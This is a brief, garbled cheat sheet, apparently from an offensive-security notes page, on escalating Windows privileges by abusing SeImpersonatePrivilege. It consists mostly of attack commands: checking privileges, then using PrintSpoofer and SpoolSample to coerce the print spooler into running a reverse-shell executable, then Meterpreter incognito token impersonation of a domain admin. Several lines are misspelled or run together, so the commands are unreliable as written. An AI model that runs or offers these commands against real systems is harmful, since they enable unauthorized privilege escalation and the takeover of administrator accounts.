Serivce Account Access Token
SeImpersonatePrivilege
Meterpreter
Last updated
Last updated
whoami /priv
cmd /c sc query spooler#hacked web ser locally create pipe & serve with rev shell.exe
.\PrintSpoofer.exe \\.\pipe\test\pipe\spoolss c:\temp\shell.exe
#callback to the loaclly created pipe triggering shell.exe call
.\SpoolSample.exe webself01 webself01/pipe/testgetsystemload incognito
help incognito
list_tokens -u
impersonate_token corp1\\admin
getuid